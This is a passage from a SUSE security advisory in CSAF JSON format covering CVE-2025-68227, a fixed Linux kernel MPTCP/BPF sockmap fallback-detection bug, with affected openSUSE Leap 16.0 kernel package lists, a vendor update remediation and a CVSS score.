"openSUSE Leap 16.0:ocfs2-kmp-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:ocfs2-kmp-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:ocfs2-kmp-rt-6.12.0-160000.26.1.x86_64"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-02-27T13:03:55Z",
"details": "moderate"
}
],
"title": "CVE-2025-68218"
},
{
"cve": "CVE-2025-68227",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2025-68227"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\nmptcp: Fix proto fallback detection with BPF\n\nThe sockmap feature allows bpf syscall from userspace, or based\non bpf sockops, replacing the sk_prot of sockets during protocol stack\nprocessing with sockmap\u0027s custom read/write interfaces.\n\u0027\u0027\u0027\ntcp_rcv_state_process()\n syn_recv_sock()/subflow_syn_recv_sock()\n tcp_init_transfer(BPF_SOCK_OPS_PASSIVE_ESTABLISHED_CB)\n bpf_skops_established \u003c== sockops\n bpf_sock_map_update(sk) \u003c== call bpf helper\n tcp_bpf_update_proto() \u003c== update sk_prot\n\u0027\u0027\u0027\n\nWhen the server has MPTCP enabled but the client sends a TCP SYN\nwithout MPTCP, subflow_syn_recv_sock() performs a fallback on the\nsubflow, replacing the subflow sk\u0027s sk_prot with the native sk_prot.\n\u0027\u0027\u0027\nsubflow_syn_recv_sock()\n subflow_ulp_fallback()\n subflow_drop_ctx()\n mptcp_subflow_ops_undo_override()\n\u0027\u0027\u0027\n\nThen, this subflow can be normally used by sockmap, which replaces the\nnative sk_prot with sockmap\u0027s custom sk_prot. The issue occurs when the\nuser executes accept::mptcp_stream_accept::mptcp_fallback_tcp_ops().\nHere, it uses sk-\u003esk_prot to compare with the native sk_prot, but this\nis incorrect when sockmap is used, as we may incorrectly set\nsk-\u003esk_socket-\u003eops.\n\nThis fix uses the more generic sk_family for the comparison instead.\n\nAdditionally, this also prevents a WARNING from occurring:\n\nresult from ./scripts/decode_stacktrace.sh:\n------------[ cut here ]------------\nWARNING: CPU: 0 PID: 337 at net/mptcp/protocol.c:68 mptcp_stream_accept \\\n(net/mptcp/protocol.c:4005)\nModules linked in:\n...\n\nPKRU: 55555554\nCall Trace:\n\u003cTASK\u003e\ndo_accept (net/socket.c:1989)\n__sys_accept4 (net/socket.c:2028 net/socket.c:2057)\n__x64_sys_accept (net/socket.c:2067)\nx64_sys_call (arch/x86/entry/syscall_64.c:41)\ndo_syscall_64 (arch/x86/entry/syscall_64.c:63 arch/x86/entry/syscall_64.c:94)\nentry_SYSCALL_64_after_hwframe (arch/x86/entry/entry_64.S:130)\nRIP: 0033:0x7f87ac92b83d\n\n---[ end trace 0000000000000000 ]---",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"openSUSE Leap 16.0:cluster-md-kmp-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:cluster-md-kmp-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:cluster-md-kmp-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:cluster-md-kmp-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:cluster-md-kmp-rt-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:dlm-kmp-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dlm-kmp-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dlm-kmp-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:dlm-kmp-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dlm-kmp-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:dlm-kmp-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:dlm-kmp-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:dlm-kmp-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dlm-kmp-rt-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:dtb-allwinner-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-altera-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-amazon-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-amd-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-amlogic-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-apm-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-apple-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-arm-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-broadcom-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-cavium-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-exynos-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-freescale-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-hisilicon-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-lg-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-marvell-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-mediatek-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-nvidia-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-qcom-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-renesas-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-rockchip-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-socionext-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-sprd-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-xilinx-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:gfs2-kmp-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:gfs2-kmp-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:gfs2-kmp-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:gfs2-kmp-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:gfs2-kmp-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:gfs2-kmp-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:gfs2-kmp-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:gfs2-kmp-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:gfs2-kmp-rt-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-64kb-devel-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-64kb-extra-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-64kb-optional-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-azure-devel-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-azure-devel-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-azure-extra-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-azure-extra-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-azure-optional-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-azure-optional-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-azure-vdso-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.aarch64",
"openSUSE Leap 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.ppc64le",
"openSUSE Leap 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.x86_64",
"openSUSE Leap 16.0:kernel-default-devel-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-default-devel-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-default-devel-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-default-devel-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-default-extra-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-default-extra-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-default-extra-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-default-extra-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-default-optional-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-default-optional-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-default-optional-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-default-optional-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-default-vdso-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-devel-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-docs-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-docs-html-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-kvmsmall-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-kvmsmall-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-kvmsmall-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-kvmsmall-vdso-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-macros-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-obs-build-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-obs-build-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-obs-build-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-obs-build-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-obs-qa-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-obs-qa-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-obs-qa-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-obs-qa-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-rt-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-rt-devel-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-rt-devel-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-rt-extra-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-rt-extra-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-rt-optional-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-rt-optional-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-rt-vdso-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-source-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-source-vanilla-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-syms-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-syms-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-syms-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-syms-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-zfcpdump-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kselftests-kmp-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kselftests-kmp-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kselftests-kmp-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kselftests-kmp-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kselftests-kmp-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kselftests-kmp-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kselftests-kmp-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kselftests-kmp-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kselftests-kmp-rt-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:ocfs2-kmp-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:ocfs2-kmp-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:ocfs2-kmp-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:ocfs2-kmp-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:ocfs2-kmp-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:ocfs2-kmp-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:ocfs2-kmp-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:ocfs2-kmp-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:ocfs2-kmp-rt-6.12.0-160000.26.1.x86_64"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2025-68227",
"url": "https://www.suse.com/security/cve/CVE-2025-68227"
},
{
"category": "external",
"summary": "SUSE Bug 1255216 for CVE-2025-68227",
"url": "https://bugzilla.suse.com/1255216"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"openSUSE Leap 16.0:cluster-md-kmp-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:cluster-md-kmp-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:cluster-md-kmp-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:cluster-md-kmp-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:cluster-md-kmp-rt-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:dlm-kmp-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dlm-kmp-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dlm-kmp-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:dlm-kmp-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dlm-kmp-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:dlm-kmp-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:dlm-kmp-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:dlm-kmp-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dlm-kmp-rt-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:dtb-allwinner-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-altera-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-amazon-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-amd-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-amlogic-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-apm-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-apple-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-arm-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-broadcom-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-cavium-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-exynos-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-freescale-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-hisilicon-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-lg-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-marvell-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-mediatek-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-nvidia-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-qcom-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-renesas-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-rockchip-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-socionext-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-sprd-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-xilinx-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:gfs2-kmp-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:gfs2-kmp-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:gfs2-kmp-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:gfs2-kmp-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:gfs2-kmp-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:gfs2-kmp-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:gfs2-kmp-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:gfs2-kmp-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:gfs2-kmp-rt-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-64kb-devel-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-64kb-extra-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-64kb-optional-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-azure-devel-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-azure-devel-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-azure-extra-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-azure-extra-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-azure-optional-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-azure-optional-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-azure-vdso-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.aarch64",
"openSUSE Leap 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.ppc64le",
"openSUSE Leap 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.x86_64",
"openSUSE Leap 16.0:kernel-default-devel-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-default-devel-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-default-devel-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-default-devel-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-default-extra-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-default-extra-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-default-extra-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-default-extra-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-default-optional-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-default-optional-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-default-optional-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-default-optional-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-default-vdso-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-devel-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-docs-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-docs-html-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-kvmsmall-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-kvmsmall-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-kvmsmall-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-kvmsmall-vdso-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-macros-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-obs-build-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-obs-build-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-obs-build-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-obs-build-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-obs-qa-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-obs-qa-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-obs-qa-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-obs-qa-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-rt-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-rt-devel-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-rt-devel-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-rt-extra-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-rt-extra-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-rt-optional-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-rt-optional-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-rt-vdso-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-source-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-source-vanilla-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-syms-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-syms-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-syms-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-syms-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-zfcpdump-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kselftests-kmp-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kselftests-kmp-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kselftests-kmp-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kselftests-kmp-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kselftests-kmp-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kselftests-kmp-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kselftests-kmp-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kselftests-kmp-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kselftests-kmp-rt-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:ocfs2-kmp-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:ocfs2-kmp-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:ocfs2-kmp-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:ocfs2-kmp-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:ocfs2-kmp-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:ocfs2-kmp-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:ocfs2-kmp-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:ocfs2-kmp-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:ocfs2-kmp-rt-6.12.0-160000.26.1.x86_64"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 5.5,
"baseSeverity": "MEDIUM",
"vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"products": [
"openSUSE Leap 16.0:cluster-md-kmp-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:cluster-md-kmp-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:cluster-md-kmp-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:cluster-md-kmp-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:cluster-md-kmp-rt-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:dlm-kmp-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dlm-kmp-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dlm-kmp-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:dlm-kmp-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dlm-kmp-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:dlm-kmp-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:dlm-kmp-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:dlm-kmp-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dlm-kmp-rt-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:dtb-allwinner-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-altera-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-amazon-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-amd-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-amlogic-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-apm-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-apple-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-arm-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-broadcom-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-cavium-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-exynos-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-freescale-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-hisilicon-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-lg-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-marvell-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-mediatek-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-nvidia-6.12.0-160000.26.1.aarch64",
